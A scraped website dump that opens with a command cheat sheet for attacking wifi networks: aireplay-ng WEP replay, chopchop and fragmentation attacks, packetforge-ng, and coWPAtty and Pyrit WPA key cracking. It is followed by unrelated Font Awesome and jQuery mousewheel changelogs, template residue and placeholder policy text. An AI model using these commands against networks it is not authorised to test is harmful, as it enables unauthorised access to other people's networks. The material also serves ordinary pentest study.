aireplay-ng -3 -b <ap> -h <you> <interface>

-3 - ARP Request Replay Attack
-b <ap> - The AP MAC address
-h <you> - Your attacking MAC address

For this attack, your wireless card needs to be in monitor mode and you will need either the MAC address of an associated client or your own MAC address after having performed a fake authentication with the AP.

Interactive Packet Replay Attack

The Interactive Packet Replay attack allows you to choose a specific packet for replaying/injecting against the target network.

aireplay-ng -2 -b <ap> -d ff:ff:ff:ff:ff:ff -f 1 -m 68 -n 86 <interface>

-2 - Interactive Packet Replay Attack
-b <ap> - The AP MAC address
-d ff:ff:ff:ff:ff:ff - Select packets with a broadcast destination address
-t 1 - Select packets with the "To Distribution System" flag set
-m <num> - Minimum packet size
-n <num> - Maximum packet size

KoreK chopchop attack

The Korek chopchop attack, when successful, can decrypt a WEP data packet without knowing the WEP key and can even work against dynamic WEP.

This attack does not recover the WEP key itself; it merely reveals the plaintext of the packets.

aireplay-ng -4 -b <ap> -h <you> <interface>

-4 - KoreK ChopChop Attack
-b <ap> - The AP MAC address
`-h - The source MAC address

Fragmentaion Attack

This attack works by obtaining a small amount of the keying material from the packet and then attempts to send ARP and/or LLC packets with known content to the AP. If the packet is successfully echoed back by the AP, then a larger amount of the keying information can be obtained from the returned packet. This process is repeated until 1500 bytes of the PRGA are obtained.

aireplay-ng -5 -b <ap> -h <you> <interface>

-5 - The Fragmentation Attack
-b <ap> - The AP MAC address
-h <you> - Source MAC address

Craft ARP Request Packet**

Packetforge-ng is used to create encrypted packets that can later be used for injection. You can create various types of packets such as UDP and ICMP packets although it is most commonly used to create ARP requests for subsequent injection.

packetforge-ng -0 -a <ap> -h <you> -l <sourceIP> -k <destIP> -y <xorFile> -w <out>

-0 - Generate an ARP request packet
-a <ap> - The AP MAC Address
-h <you> - The source MAC address
-k <distIP> - The destination IP
-l <sourceIP> - The source IP
-y <xorFile> - The PRGA filename
-w - The filename to save the packet to

Inject Packet/Interactive Packet Replay

This attack uses a crafted ARP request packet and injects it to capture enough IVs to subsequently crack the WEP key on the AP

aireplay-ng -2 -r <packet> <interface>

-2 - Interactive Packet Replay Attack
-r <packet> - Filename of the crafted ARP packet

Fake Shared Key Authentication

This attack is used for bypassing WEP Share Key Authentication. It uses a captured keystream file and conducts a fake authentication.

aireplay -1 -0 -e <essid> -y <captureFile> -a <ap> -h <you> <interface>

-1 - Fake Authentication Attack
0 - Reassociation timing in seconds
-e <essid> - The wireless network name(SSID)
-y <captureFile> - Filename of the captured keystream
-a <ap> - The AP MAC address
-h <you> - Source MAC address

WPA Attacks

coWPAtty Attack

Dictionary Mode

coWPAtty is a versatile tool that can recover WPA pre-shared keys, from a captured handshake, using either dictionary or rainbow table attacks.

cowpatty -r <capture> -f <wordlist> -2 -s <essid>

-r <capture> - The capture filename
-f <wordlist> - The wordlist to use
-2 - Use non-strict mode as coWPAtty has an issue with airodump-ng captures
`-s - The network ESSID

Rainbow Table Mode

Generate the hashes for our ESSID along with a dictionary file containing password

genpmk -f <wordlist> -d <hashesFilename> -s <essid>

-f <wordlist> - The path to the dictionary file
-d <hashesFilename> - The filename to save the computed hashes to
-s <essid> - The network ESSID

Run coWPAtty using the generated hashes

cowpatty -r <capture> -d <hashesFilename> -2 -s <essid>

-r <capture> - The capture filename
-d <hashesFilename> - The file name of the computed hashes to use
-2 - Use non-strict mode as coWPAtty has an issue with airodump-ng captures
-s <essid> - The network ESSID

Pyrit Sniff

Pyrit, like airolib-ng and coWPAtty, uses a pre-computed database of WPA pre-shared key tables, though with the distinct advantage of being able to leverage GPUs to accelerate the generation of PMK tables.

pyrit -r <interface> -o <capture> stripLive

-r <interface> - The wireless interface to use
-o <capture> - The file to save the captured data to
striplive - Only saves the WPA handshakes

Validate the 4-way handshake

Pyrit is able to analyze the capture file and determine if the capture contains any valid handshakes

pyrit -r <capture> analyze

-r <capture> - The capture file

Pyrit Crack Dictionary

Launching pyrit using a basic dictionary attack

pyrit -r <capture> -i <wordlist> -b <ap> attack_passthrough

-r <capture> - The capture file
-i <wordlist> - The wordlist file to use
-b <ap> - The OPTIONAL BSSID of the target AP
attack_passthrough - Attempt to crack the WPA password using the wordlist

Pyrit Crack Database

Import Wordlist into Database

pyrit -i <wordlist> import_passwords

-i <wordlist>- The wordlist to use
import_passwords - Import the passwords into the database

Add the ESSID of the Access Point

pyrit -e <essid> create_essid

-e <essid> - The network ESSID
create_essid - Import the network ESSID

Compute the PMKs

pyrit batch

Launch Pyrit in database mode

pyrit -r <capture> -b <ap> attack_db

-r <capture> - The capture file
-b <ap> - The AP’s MAC address

attacking wifi series

Hacking WPA/WPA2 PSK

Bypassing WEP Shared Key Authentication

Hacking Clientess WEP Networks

Hacking WEP via a Client

Hacking WEP With Connected Clients

Overview & Commands

wifi security

Dangers of using Open and Public Wifi Hotspots

Setting up a Rasberry Pi as a Wireless AP

Attacking Wifi Series

Posts by Category : Attacking Wifi Series

A series of posts covering tools and techniques used in attacking/pen testing wireless networks.

04 May 2020 Hacking WPA/WPA2 PSK

27 Apr 2020 Bypassing WEP Shared Key Authentication

25 Apr 2020 Hacking Clientess WEP Networks

23 Apr 2020 Hacking WEP via a Client

18 Mar 2020 Hacking WEP With Connected Clients

03 Dec 2019 Overview & Commands

Wifi Security

Posts by Category : {{ page.title }}

{% for post in site.categories["wifi security"] %}

{% endfor %}

Security Policy

# Security Policy ## Supported Versions Use this section to tell people about which versions of your project are currently being supported with security updates. | Version | Supported | | ------- | ------------------ | | 5.1.x | :white_check_mark: | | 5.0.x | :x: | | 4.0.x | :white_check_mark: | | < 4.0 | :x: | ## Reporting a Vulnerability Use this section to tell people how to report a vulnerability. Tell them where to go, how often they can expect to get an update on a reported vulnerability, what to expect if the vulnerability is accepted or declined, etc.

Change Log

# Change Log All notable changes to this project will be documented in this file. The format is based on [Keep a Changelog](http://keepachangelog.com/) and this project adheres to [Semantic Versioning](http://semver.org/). **Note that references to the Font-Awesome-Pro repository refer to a GitHub repository that is by invitation only. You will get a 404 - Not Found if you do not have access** --- ## [5.1.0](https://github.com/FortAwesome/Font-Awesome-Pro/releases/tag/5.1.0) - 2018-06-20 **Minor version upgrade notice: there are some backward-incompatible changes to this release. See the [UPGRADING.md guide](https://github.com/FortAwesome/Font-Awesome/blob/master/UPGRADING.md) for more information.** ### Added * New Emoji, Design, and Travel category pack * Another group of requested and commissioned icons * Version 4 shim for Web Fonts with CSS * New simplified download and NPM packages * @fortawesome/fontawesome-free and @fortawesome/fontawesome-pro NPM packages that match what's available in the CDN and .ZIP files * Brand icons rev, nimblr, megaport, mailchimp, hornbill, wix, weebly, themeco, squarespace, aws, shopware * API method toHtml() for converting abstract objects to HTML * API method counter() to generate Layers Counters * API method watch() to configure MutationObserver and watch DOM for icon changes and additions ### Changed * Relocating sponsor data to a separate sponsors.yml * Updated teamspeak brand icon * No more default exports in the CommonJS/ES packages (anything installed from NPM) * Greatly improved performance and rendering of CSS pseudo-elements with SVG and JavaScript * Configuration of SVG with JavaScript can now be done with attributes on the script tag * SVG with JavaScript pseudo-elements now match syntax (font-family, font-weight) of Web Fonts with CSS ### Fixed * Tree shaking of all NPM packages by default * Alignment of the book-open and dice-six icon * Correcting creative-commons * Incorrect license on the fontawesome-common-types package * Improve ligatures that share a base name with another ligature * Correcting solid style of the digital-tachograph icon * Prevent duplicating classes in some scenarios with SVG with JavaScript * Duplicate insertion of CSS when insertCss() method was called * Missing TypeScript definitions for the free-brands-svg-icons package --- ## [5.0.13](https://github.com/FortAwesome/Font-Awesome/releases/tag/5.0.13) - 2018-05-10 ### Added * 68 icons to Free and 165 to Pro of the most requested icons in Font Awesome --- ## [5.0.12](https://github.com/FortAwesome/Font-Awesome/releases/tag/5.0.12) - 2018-05-03 ### Added * A long time ago in a galaxy far, far away some icons were added ### Fixed * Renamed the r brand to r-project to prevent ligature collision with the "r" glyph --- ## [5.0.11](https://github.com/FortAwesome/Font-Awesome/releases/tag/5.0.11) - 2018-05-01 ### Added * 16 new user icons * Full set of Creative Commons symbols * Regular style comment-dots used for v4 comment-alt in shim * Top 6 brand icons: r, ebay, mastodon, researchgate, keybase, teamspeak ### Changed * Revised slider icons FortAwesome/Font-Awesome#11872 * Make desktop typeface easier to find in apps that support ligature previews ### Fixed * Remove errant XML entity from the lastfm-square icon FortAwesome/Font-Awesome#12847 * Correcting paths in cloud icons FortAwesome/Font-Awesome-Pro#920 --- ## [5.0.10](https://github.com/FortAwesome/Font-Awesome/releases/tag/5.0.10) - 2018-04-10 ### Added * New java brand icon FortAwesome/Font-Awesome#386 ### Changed * Updating depth of dna icon * Updating pied-piper, adding pied-piper-hat ### Fixed * Correcting path errors on readme icon FortAwesome/Font-Awesome#12754 * Light style of lamp icon FortAwesome/Font-Awesome#12725 --- ## [5.0.9](https://github.com/FortAwesome/Font-Awesome/releases/tag/5.0.9) - 2018-03-27 ### Added * New Chat icon pack and category * New Charity icon pack and category * New Moving icon pack and category * New icons hands and hand-holding ### Changed * Updated flipboard, readme, and houzz brand icon * Making all solid icons in the medical icon pack free * Updated hand-holding-box and hand-receiving in the Light style ### Fixed * Missing box-sizing CSS property for fa-layers-counter --- ## [5.0.8](https://github.com/FortAwesome/Font-Awesome/releases/tag/5.0.8) - 2018-03-01 ### Fixed * OTF font files missing ligatures for Pro styles FortAwesome/Font-Awesome#12486 FortAwesome/Font-Awesome-Pro#1034 --- ## [5.0.7](https://github.com/FortAwesome/Font-Awesome/releases/tag/5.0.7) - 2018-02-26 ### Added * New Logistics category * New Medical category * Individual SVG files available from the Font Awesome CDN * Additional search terms ### Changed * Apple brand icon update FortAwesome/Font-Awesome#12337 * Disable mutation observers with fontawesome.noAuto() is called * License information now references https URL scheme ### Fixed * Missing TypeScript names FortAwesome/react-fontawesome#83 * Adding categories metadata FortAwesome/Font-Awesome#12034 * TypeScript improvement for fontawesome.layer() * Correcting a melting, wobbling, weird-looking whistle --- ## [5.0.6](https://github.com/FortAwesome/Font-Awesome/releases/tag/5.0.6) - 2018-01-25 ### Fixed * @fortawesome/fontawesome-pro-light missing submodules --- ## [5.0.5](https://github.com/FortAwesome/Font-Awesome-Pro/releases/tag/5.0.5) - 2018-01-25 ### Added * New Sports category * New Chess category * Added brand icons for flipboard, php, quinscape, and hips ### Fixed * Sass and Less mixin fa-icon() now uses ems instead of percentage * Corrected misspelling of "Alternate" in category labels * Improved TypeScript definitions for @fortawesome/fontawesome * Server-side rendering was failing due to DOM-specific object access * SVG attributes "data-fa-processed" renamed to "data-fa-i2svg", only applies if rendered with i2svg() method --- ## [5.0.4](https://github.com/FortAwesome/Font-Awesome-Pro/releases/tag/5.0.4) - 2018-01-10 ### Changed * Updating all NPM package READMEs ### Fixed * Improving TypeScript exports and fixing some incorrect definitions * TypeScript error when importing entire style Fort-Awesome/Font-Awesome#12072 * Pseudo-elements erasing text contents in parent container Fort-Awesome/Font-Awesome-Pro#11995 * fa-layers-text misalignment when using Bootstrap Fort-Awesome/Font-Awesome#11871 --- ## [5.0.3](https://github.com/FortAwesome/Font-Awesome-Pro/releases/tag/5.0.3) - 2018-01-08 ### Added * Adding elementor, youtube-square brand icons * Adding window-minimize to the Free subset * TypeScript support for all NPM packages ### Fixed * Corrected uneven spacing in university, address-book, address-card, id-badge, id-card, mouse-pointer, phone-volume, portrait, user-alt, user-circle, user-md, user-plus, user-times, user , users * Corrected uneven spacing in brand icons behance-square, dashcube, discourse, ember, erlang, fort-awesome, js-square, laravel, mix, patreon, palfed, phoenix-framework, node-js, skyatlas, stack-exchange, stripe, viber, weixin, yahoo , yoast --- ## [5.0.2](https://github.com/FortAwesome/Font-Awesome-Pro/releases/tag/5.0.2) - 2017-12-19 ### Added * Adding amazon-pay, cc-amazon-pay, korvue, ethereum brand icons * Adding stopwatch to Free version ### Changed * Ligatures now support capital case, all caps, and title case ### Fixed * NPM packages now behave the same way as CDN and browser-specific packages FortAwesome/Font-Awesome-Pro#727 FortAwesome/Font-Awesome-Pro#896 FortAwesome/Font-Awesome-Pro#891 * Icon doesn't change when pseudo-element content changes FortAwesome/Font-Awesome-Pro#839 * Invalid XML in sprites FortAwesome/Font-Awesome-Pro#927 * Incorrect version in Sass and Less variable files --- ## [5.0.1](https://github.com/FortAwesome/Font-Awesome-Pro/releases/tag/5.0.1) - 2017-12-08 ### Added * Adding font-awesome-flag, lock-open, redo-alt, sync-alt, undo-alt to the Free version * New NPM packages `fontawesome-free-webfonts` and `fontawesome-pro-webfonts` * Adding old icon names to search terms for renamed icons * Extensive metadata added to the `advanced-options` directory * Adding stripe-s brand icon * Adding typo3 brand icon ### Changed * Updated dropbox brand icon to match new branding guidelines * Updated firefox brand icon * Updated strava brand icon * OTF font file now include a space character ### Fixed * OTF font file now supports different styles in Windows * OTF font file "j" character now has correct space on the right * Modifying the `class` attribute on an existing `` will now precede other link and style definitions * BREAKING `fontawesome.text` and `fontawesome.icon` now use `styles` param instead of `style` * Updated sizing for twitter, discord, youtube * Class fa-li now respects line-height and has new recommended markup (see included docs) ### Fixed * Duplicate `style` tags being added in the head FortAwesome/Font-Awesome-Pro#858 * Error with icon composition/masking that caused a confusing error message * An error when using pseudo elements and the element is empty (Array.reduce error) * Icons not being replaced with SVG if the text content is not empty --- ## [5.0.0-rc4](https://github.com/FortAwesome/Font-Awesome-Pro/releases/tag/5.0.0-rc4) - 2017-10-27 ### Added * Ligature support in the OTF font * Vue.js brand icon * Sass and Less brand icons * Autoprefixer brand icon * Individual icon imports in icon packages FortAwesome/Font-Awesome-Pro#808 ### Changed * Better poo eyes * Renamed HTML status classes to `fontawesome-i2svg-active`, `fontawesome-i2svg-pending`, `fontawesome-i2svg-complete` * HTML status class for active is added only after the first batch of icon replacements occur * Added mention of newer versions of iOS in documentation FortAwesome/Font-Awesome-Pro#810 ### Fixed * Performance and missing features with mutation observer (should fix FortAwesome/Font-Awesome-Pro#813) * Incorrect handling of icon class and style attributes when using autoReplace = 'nest' FortAwesome/Font-Awesome-Pro#809 * Pseudo elements not added or removed when class mutations occur FortAwesome/Font-Awesome-Pro#821 --- ## [5.0.0-rc3](https://github.com/FortAwesome/Font-Awesome-Pro/releases/tag/5.0.0-rc3) - 2017-10-13 ### Added * Node.js brand icon FortAwesome/Font-Awesome-Pro#779 * React brand icon FortAwesome/Font-Awesome-Pro#780 * OSI brand icon FortAwesome/Font-Awesome-Pro#748 * Add a class to the html element when icon replacement is complete FortAwesome/Font-Awesome-Pro#778 * Add support for symbols in API including ability to name the symbol * Use CSS pseudo elements (:before and :after) to make trigger SVG replacements ### Changed * Switched the locations of fork and knife in utensils-alt FortAwesome/Font-Awesome-Pro#466 * Updated the AWS brand icon FortAwesome/Font-Awesome-Pro#735 * Updated Apple App Store icon FortAwesome/Font-Awesome-Pro#728 ### Fixed * Do not throw an error if icon is missing when calling icon() method in API * Ensure that unicode values do not change between releases * Version field is missing in fontawesome-pro-brands/package.json FortAwesome/Font-Awesome-Pro#781 * Repeated commenting out of fa-layers when i2svg is called FortAwesome/Font-Awesome-Pro#788 * Title not showing up correctly for SVG FortAwesome/Font-Awesome-Pro#786 --- ## [5.0.0-rc2](https://github.com/FortAwesome/Font-Awesome-Pro/releases/tag/5.0.0-rc2) - 2017-09-22 ### Added * Brand icons: accusoft, ns8, uniregistry ### Fixed * Link to the npm package in the docs FortAwesome/Font-Awesome-Pro#729 * Incorrect reference to fontawesome-pro.js in docs --- ## [5.0.0-rc1](https://github.com/FortAwesome/Font-Awesome-Pro/releases/tag/5.0.0-rc1) - 2017-09-15 ### Changed * New Bitbucket logo FortAwesome/Font-Awesome-Pro#720 * Modifed the star icons to match use case better FortAwesome/Font-Awesome-Pro#710 * Switched names of css3 and css3-alt to reflect correct branding ### Fixed * Correct whitespace with the Visa logo FortAwesome/Font-Awesome-Pro#719 * Improve OTF support by passing through FontForge FortAwesome/Font-Awesome-Pro#565 * Fonts with "undefined" name FortAwesome/Font-Awesome-Pro#711 * Shims will only function if using old prefix of "fa" FortAwesome/Font-Awesome-Pro#692 * Added missing "youtube" icon to categories --- ## [5.0.0-beta7](https://github.com/FortAwesome/Font-Awesome-Pro/releases/tag/5.0.0-beta7) - 2017-09-11 ### Added * Ability to nest the `` FortAwesome/Font-Awesome-Pro#624 * Define icons as symbols and leverage SVG sprites FortAwesome/Font-Awesome-Pro#629 * Added alternative CSS3 logo FortAwesome/Font-Awesome-Pro#682 ### Changed * Power Transforms now execute inside the SVG instead of on the root element * Filenames have changed to reflect a better division between Font Awesome Free and Pro ### Fixed * More improvements to the version 4 shim FortAwesome/Font-Awesome-Pro#673 FortAwesome/Font-Awesome-Pro#678 FortAwesome/Font-Awesome-Pro#686 FortAwesome/Font-Awesome-Pro#687 FortAwesome/Font-Awesome-Pro#692 * Animation support for inline SVG now works as expected FortAwesome/Font-Awesome-Pro#662 --- ## [5.0.0-beta6](https://github.com/FortAwesome/Font-Awesome-Pro/releases/tag/5.0.0-beta6) - 2017-09-01 ### Added * Ability to flip horizontal and vertical with CSS classes fa-flip-horizontal and fa-flip-vertical * New film-alt icon that allows for layering other icons * Microsoft brand ### Changed * New YouTube branding FortAwesome/Font-Awesome-Pro#646 ### Fixed * Fixed a bunch of shim-related issues * Cogs off center FortAwesome/Font-Awesome-Pro#663 * Corrected icons/categories.yml with canonical names --- ## [5.0.0-beta5](https://github.com/FortAwesome/Font-Awesome-Pro/releases/tag/5.0.0-beta5) - 2017-08-25 ### Added * Full parity with Font Awesome 4! 616 total core icons in each style * 297 total brand and logo icons * Separate CSS file to accompany the SVG Framework FortAwesome/Font-Awesome-Pro#627 * Alternative to the dots icon FortAwesome/Font-Awesome-Pro#608 * Made window icons consistent FortAwesome/Font-Awesome-Pro#611 ### Fixed * Production builds not correctly being detected FortAwesome/Font-Awesome-Pro#631 --- ## [5.0.0-beta4](https://github.com/FortAwesome/Font-Awesome-Pro/releases/tag/5.0.0-beta4) - 2017-08-18 ### Added * 590 total core icons in each style * 291 total brand and logo icons ### Fixed * Reduced the size of JS file from 66 to 22 kb * Regression caused by with web font alignment FortAwesome/Font-Awesome-Pro#460 --- ## [5.0.0-beta3](https://github.com/FortAwesome/Font-Awesome-Pro/releases/tag/5.0.0-beta3) - 2017-08-15 ### Added * 583 total core icons in each style ### Fixed * Documentation improvements and fixes FortAwesome/Font-Awesome-Pro#586 * Vertical alignment of TTF and OTF fonts FortAwesome/Font-Awesome-Pro#460 * The "fa_500px" icon should be named "fa500px" FortAwesome/Font-Awesome-Pro#578 --- ## [5.0.0-beta2](https://github.com/FortAwesome/Font-Awesome-Pro/releases/tag/5.0.0-beta2) - 2017-08-11 ### Added * 570 total core icons in each style * 291 total brand and logo icons * NPM (ES6, CommonJS, AMD) packages for use with other JavaScript libraries and tools FortAwesome/Font-Awesome-Pro#574 * Added a guide to choosing which implementation is best for you FortAwesome/Font-Awesome-Pro#532 ### Changed * Showing a missing icon is now configurable FortAwesome/Font-Awesome-Pro#569 ### Fixed * Composition framework now works in browsers that do not support transform-origin FortAwesome/Font-Awesome-Pro#564 --- ## [5.0.0-beta1](https://github.com/FortAwesome/Font-Awesome-Pro/releases/tag/5.0.0-beta1) - 2017-08-04 ### Added * 524 total core icons in each style * 289 total brand and logo icons * New composition framework FortAwesome/Font-Awesome-Pro#537 * Animated indicator if you use an icon that does not exist ### Changed * Basic linting for Sass and Less files * Add JavaScript guard block to prevent leaking errors * Add support for automatic accessibility to SVG Framework Layers ### Fixed * Regression where stacks and pulled and bordered were not working in SVG Framework * SVG sprite example had confusing inline styles FortAwesome/Font-Awesome-Pro#549 * Make getting started page more consistent between examples FortAwesome/Font-Awesome-Pro#544 * Added missing sizes fa-[6-10], xs, sm FortAwesome/Font-Awesome-Pro#546 * Title tag missing in SVG sprites FortAwesome/Font-Awesome-Pro#536 --- ## [5.0.0-alpha7](https://github.com/FortAwesome/Font-Awesome-Pro/releases/tag/5.0.0-alpha7) - 2017-07-28 ### Added * 451 total core icons in each style * 281 total brand and logo icons * Less support is back! * OpenType (.otf) file formats for web fonts ### Changed * Changes the fa-spin animation to go from 0deg to 360deg to eliminate hitch FortAwesome/Font-Awesome-Pro#522 * Improved mutation handling FortAwesome/Font-Awesome-Pro#517 ### Fixed * fa-fw now works correctly with the SVG framework FortAwesome/Font-Awesome-Pro#530 * Removed execute bit on some icon files FortAwesome/Font-Awesome-Pro#520 --- ## [5.0.0-alpha6](https://github.com/FortAwesome/Font-Awesome-Pro/releases/tag/5.0.0-alpha6) - 2017-07-21 ### Added * 410 total core icons in each style * 270 total brand and logo icons * All new Font Awesome 4 shim file * Beginnings of a public JS API FortAwesome/Font-Awesome-Pro#512 ### Changed * Added Firefox ESR and Chrome for Businesses to browser compatibility FortAwesome/Font-Awesome-Pro#506 ### Fixed * Ensure that SVG title attributes are unique * Fixed incorrect viewBox sizes FortAwesome/Font-Awesome-Pro#492 * Fix chart-area alignment in the solid style FortAwesome/Font-Awesome-Pro#508 * Add missing xmlns attributes in some SVGs FortAwesome/Font-Awesome-Pro#509 --- ## [5.0.0-alpha5](https://github.com/FortAwesome/Font-Awesome-Pro/releases/tag/5.0.0-alpha5) - 2017-07-14 ### Added * 228 total brand and logo icons * New transform framework for sizing, moving, rotating, and flipping icons * New icon counters * New layers framework * New text overlays * Auto-comments with the original source icons alongside SVG replacements ### Changed * Autoprefixer to correctly add browser prefixes for supported browsers * Removed browser-specific CSS properties in Sass source files (now relies on autoprefixer) ### Fixed * The rotation on checkmark icons * Other icon feedback from previous weeks * Correct fixed width settings to 1.25em (based on the new 16px grid) * Icons displaying as block instead of inline-block in IE and older Safari --- ## [5.0.0-alpha4](https://github.com/FortAwesome/Font-Awesome-Pro/releases/tag/5.0.0-alpha4) - 2017-07-07 ### Added * 93 brand icons --- ## [5.0.0-alpha3](https://github.com/FortAwesome/Font-Awesome-Pro/releases/tag/5.0.0-alpha3) - 2017-06-30 ### Added * 95 additional icons; including file types, directional, and some existing and new brand icons ### Fixed * Wrong content type in generated CSS FortAwesome/Font-Awesome-Pro#458 * Removal of query string from static resources FortAwesome/Font-Awesome-Pro#458 * SVG font ID's are incorrect in webfont implementation FortAwesome/Font-Awesome-Pro#474 --- ## [5.0.0-alpha2](https://github.com/FortAwesome/Font-Awesome-Pro/releases/tag/5.0.0-alpha2) - 2017-06-27 ### Added * How/When to upgrade from FA4 to FA5 FortAwesome/Font-Awesome-Pro#454 ### Fixed * Links to SVG files broken in the example files FortAwesome/Font-Awesome-Pro#456 * Misnamed icon names in examples FortAwesome/Font-Awesome-Pro#445 * Mangled HTML in the Getting Started example FortAwesome/Font-Awesome-Pro#442 * Bad grammar and typos FortAwesome/Font-Awesome-Pro#443 * fas-arrow-to-top is identical to fas-arrow-to-right FortAwesome/Font-Awesome-Pro#423 * Vertical alignment issues with webfont implementation FortAwesome/Font-Awesome-Pro#444 * Add browser compatibility tables to demo FortAwesome/Font-Awesome-Pro#435 * Remove MAC OS feces from builds FortAwesome/Font-Awesome-Pro#437 * TTF naming issues that prevent correct usage/installation FortAwesome/Font-Awesome-Pro#450 * Correct CSS for SVG framework stacking, was reversed from normal FortAwesome/Font-Awesome-Pro#452 --- ## [5.0.0-alpha1](https://github.com/FortAwesome/Font-Awesome-Pro/releases/tag/5.0.0-alpha1) - 2017-06-23 ### Added * 300+ more icons * Brands pack * New JavaScript based SVG Framework * New SVG Sprites based framework * Source SVGs * Documentation with a convenient build-in web server ### Changed * New directory structure

Upgrading Guide
# Upgrading Guide See the [CHANGELOG.md](/assets/bower_components/font-awesome/CHANGELOG/) for detailed information about what has changed between versions. This guide is useful to figure out what you need to do between breaking changes. As always, [submit issues](https://github.com/FortAwesome/Font-Awesome/issues/new) that you run into with this guide or with these upgrades to us. ## 5.0.x to 5.1.0 ### New packages available for browser-only integration **If you were previously using @fortawesome/fontawesome you need to switch to one of the new packages.** Our Free and Pro CDN provide access to JS, CSS, sprites, and separate SVG files. We've now made these files conveniently available through NPM. * [@fortawesome/fontawesome-free](https://www.npmjs.com/package/@fortawesome/fontawesome-free) * @fortawesome/fontawesome-pro (private package, requires Pro subscription) If you are familiar with the paths and options available with the CDN these packages should be familiar. Information about [Font Awesome Pro subscriptions](https://fontawesome.com/pro) can be found in your [Font Awesome awesome account](https://fontawesome.com/account/services). ### Renamed packages The following packages have been renamed as part of 5.1.0 of Font Awesome. _All packages are in the [@fortawesome NPM scope](https://www.npmjs.com/search?q=scope:fortawesome&page=1&ranking=optimal)_ | Old package(1) | New package | |---------------------------|------------------------| | fontawesome-free-webfonts | fontawesome-free | | fontawesome-pro-webfonts | fontawesome-pro | | fontawesome-free-solid | free-solid-svg-icons | | fontawesome-free-regular | free-regular-svg-icons | | fontawesome-free-brands | free-brands-svg-icons | | fontawesome-pro-solid | pro-solid-svg-icons | | fontawesome-pro-regular | pro-regular-svg-icons | | fontawesome-pro-light | pro-light-svg-icons | (1) Old packages have now been deprecated. They are still available but will only receive high priority patch release fixes. **You'll need to update your package.json file with the renamed packages and new versions.** ### No more default imports Recently we spent a good deal of time supporting TypeScript to enable us to create the Angular Font Awesome component. During that adventure we [were](https://basarat.gitbooks.io/typescript/docs/tips/defaultIsBad.html) [convinced](https://blog.neufund.org/why-we-have-banned-default-exports-and-you-should-do-the-same-d51fdc2cf2ad) that we were going to remove default exports from all of our components, libraries, and packages. This is complete with the umbrella release of `5.1.0` of Font Awesome. What does that mean? ~~Old way:~~ ```javascript import fontawesome from '@fortawesome/fontawesome' import solid from '@fortawesome/fontawesome-free-solid' import faTwitter from '@fortawesome/fontawesome-free-brands/faTwitter' import FontAwesomeIcon from '@fortawesome/vue-fontawesome' library.add(solid, faTwitter) ``` New way: ```javascript import { library, dom } from '@fortawesome/fontawesome-svg-core' import { fas } from '@fortawesome/free-solid-svg-icons' import { faTwitter } from '@fortawesome/free-brands-svg-icons' import { FontAwesomeIcon } from '@fortawesome/vue-fontawesome' library.add(fas, faTwitter) // Kicks off the process of finding tags and replacing with

Mouse Wheel ChangeLog
# Mouse Wheel ChangeLog ## 3.1.13 * Update copyright notice and license to remove years * Create the correct compressed version * Remove the obsolete jQuery Plugin Registry file ## 3.1.12 * Fix possible 0 value for line height when in delta mode 1 ## 3.1.11 * Fix version number for package managers... ## 3.1.10 * Fix issue with calculating line height when using older versions of jQuery * Add offsetX/Y normalization with setting to turn it off * Cleans up data on teardown ## 3.1.9 * Fix bower.json file * Updated how the deltas are adjusted for older mousewheel based events that have deltas that are factors of 120. * Add $.event.special.mousewheel.settings.adjustOldDeltas (defaults to true) to turn off adjusting of old deltas that are factors of 120. You'd turn this off if you want to be as close to native scrolling as possible. ## 3.1.8 * Even better handling of older browsers that use a wheelDelta based on 120 * And fix version reported by `$.event.special.mousewheel` ## 3.1.7 * Better handle the `deltaMode` values 1 (lines) and 2 (pages) * Attempt to better handle older browsers that use a wheelDelta based on 120 ## 3.1.6 * Deprecating `delta`, `deltaX`, and `deltaY` event handler arguments * Update actual event object with normalized `deltaX `and `deltaY` values (`event.deltaX`, `event.deltaY`) * Add `deltaFactor` to the event object (`event.deltaFactor`) * Handle `> 0` but `< 1` deltas better * Do not fire the event if `deltaX` and `deltaY` are `0` * Better handle different devices that give different `lowestDelta` values * Add `$.event.special.mousewheel.version` * Some clean up ## 3.1.5 * Bad release because I did not update the new `$.event.special.mousewheel.version` ## 3.1.4 * Always set the `deltaY` * Add back in the `deltaX` and `deltaY` support for older Firefox versions ## 3.1.3 * Include `MozMousePixelScroll` in the to fix list to avoid inconsistent behavior in older Firefox ## 3.1.2 * Include grunt utilities for development purposes (jshint and uglify) * Include support for browserify * Some basic cleaning up ## 3.1.1 * Fix rounding issue with deltas less than zero ## 3.1.0 * Fix Firefox 17+ issues by using new wheel event * Normalize delta values * Adds horizontal support for IE 9+ by using new wheel event * Support AMD loaders ## 3.0.6 * Fix issue with delta being 0 in Firefox ## 3.0.5 * jQuery 1.7 compatibility ## 3.0.4 * Fix IE issue ## 3.0.3 * Added `deltaX` and `deltaY` for horizontal scrolling support (Thanks to Seamus Leahy) ## 3.0.2 * Fixed delta being opposite value in latest Opera * No longer fix `pageX`, `pageY` for older Mozilla browsers * Removed browser detection * Cleaned up the code ## 3.0.1 * Bad release... creating a new release due to plugins.jquery.com issue :( ## 3.0 * Uses new special events API in jQuery 1.2.2+ * You can now treat `mousewheel` as a normal event and use `.bind`, `.unbind` and `.trigger` * Using jQuery.data API for expandos ## 2.2 * Fixed `pageX`, `pageY`, `clientX` and `clientY` event properties for Mozilla based browsers ## 2.1.1 * Updated to work with jQuery 1.1.3 * Used one instead of bind to do unload event for clean up ## 2.1 * Fixed an issue with the unload handler ## 2.0 * Major reduction in code size and complexity (internals have change a whole lot) ## 1.0 * Fixed Opera issue * Fixed an issue with children elements that also have a mousewheel handler * Added ability to handle multiple handlers

Security Policy
# Security Policy ## Supported Versions Use this section to tell people about which versions of your project are currently being supported with security updates. | Version | Supported | | ------- | ------------------ | | 5.1.x | :white_check_mark: | | 5.0.x | :x: | | 4.0.x | :white_check_mark: | | < 4.0 | :x: | ## Reporting a Vulnerability Use this section to tell people how to report a vulnerability. Tell them where to go, how often they can expect to get an update on a reported vulnerability, what to expect if the vulnerability is accepted or declined, etc.

Change Log
